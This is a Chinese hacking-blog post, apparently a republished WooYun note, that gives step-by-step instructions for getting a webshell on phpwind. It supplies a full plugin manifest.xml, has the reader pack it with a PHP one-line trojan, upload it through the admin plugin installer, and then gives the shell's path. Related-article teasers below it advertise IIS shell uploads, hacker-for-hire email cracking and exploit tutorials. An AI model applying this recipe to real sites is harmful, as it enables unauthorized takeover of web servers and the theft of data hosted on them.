phpwind后台getshell ***

hacker5年前黑客文章1243

在phpwind后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.

一、先 *** 一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。

manifest.xml代码如下:

<?xml version="1.0" encoding="gbk"?>
<manifest>
<application>
<name>getshell</name>
<alias>getshell</alias>
<version>1.0</version>
<pw-version>1.0</pw-version>
<type>app</type>
<description>getshell
</description>
<charset>gbk</charset>
<website>http://wooyun.org</website>
<author-name>123@wooyun</author-name>
<author-email>root@wooyun.org</author-email>
<author-icon>http://wooyun.org</author-icon>
</application>
    <res>res</res>
</manifest> 

将以上文件打包成zip格式。

 

二、在后台 点击云平台→应用管理→本地安装处上传 *** 好的安装包,并点击安装。

9477714 三、shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php
标签: 黑客技术

相关文章

iis7.5加fck解析漏洞后台拿shell

IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxo...

黑客接单平台:邮箱破解的原理和方法

黑客接单网:很多人不知道怎么破解邮箱,下面我来简单介绍一下: 我所讲的是用实际的例子来教大家,例子一,这是登陆163MAIL后产生的一个代码,就是它,包含了163邮箱使用者的 密码信息,对I...

网络服务器是啥系统软件?实际叫什么?及其是多少位几核

网络服务器是啥系统软件?实际叫什么?及其是多少位几核

1、提权的定义:将系统软件管理权限提高到root、 system 或是 administrator。   2、在网上提权的界定:取得网络服务器管理权限,而且取得成功登录网络服务器。 可是,...

韩剧《幽灵》电视剧中出现的黑客软件工具

韩剧《幽灵》电视剧中出现的黑客软件工具 一、入侵检测类: 1、Wireshark 抓包工具,前称Ethereal。是一个网络封包分析软件,用来撷取网络封包,并尽可能显示...

一张搜集二级域名的思维脑图

一张搜集二级域名的思维脑图

网络黑客的渗入方式,实际上压根来自安全性的木桶原理。 决策一个公司的网络信息安全,在于安全性结构加固最少的那片木工板。 网络黑客通常会对企业安全生产里最少的那片木工板着手。 网络黑客在渗入的情况下,...

ThinPHP5

规矩,大家立即上基础教程,很少bb,这里有了你要想学习培训的网络黑客基础教程,浓浓的干货知识赠给大伙儿,沒有空话,现在开始! ThinPHP5.1 程序运行系统漏洞...